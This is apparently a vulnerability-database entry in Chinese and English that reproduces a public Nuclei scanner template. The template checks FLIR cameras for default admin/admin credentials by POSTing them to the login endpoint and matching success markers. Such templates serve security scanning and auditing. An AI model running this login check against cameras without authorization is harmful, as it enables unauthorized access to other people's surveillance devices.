flir-default-login: Flir Default Login

日期: 2025-08-01 | 影响软件: Flir Default Login | POC: 已公开

漏洞描述

Flir default login credentials (admin/admin) were discovered.

PoC代码[已公开]

id: flir-default-login

info:
  name: Flir Default Login
  author: pikpikcu
  severity: medium
  description: Flir default login credentials (admin/admin) were discovered.
  reference:
    - https://securitycamcenter.com/flir-default-password/
  classification:
    cwe-id: CWE-798
  metadata:
    max-request: 1
  tags: default-login,flir,camera,iot,vuln

http:
  - raw:
      - |
        POST /login/dologin HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        user_name={{username}}&user_password={{password}}

    payloads:
      username:
        - admin
      password:
        - admin
    attack: pitchfork

    matchers-condition: and
    matchers:
      - type: word
        words:
          - '"success"'

      - type: dsl
        dsl:
          - contains(tolower(header), 'text/html')
          - contains(tolower(header), 'phpsessid')
          - contains(tolower(header), 'showcameraid')
        condition: and

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100afddbcb27d64395a954c03b95547f6b80519581633181cee9faf68d2dab5292002210085a4aef1add8c341e6f48327fc140dd7eff66496b79f99490136fbadd17c36e6:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/default-logins/flir/flir-default-login.yaml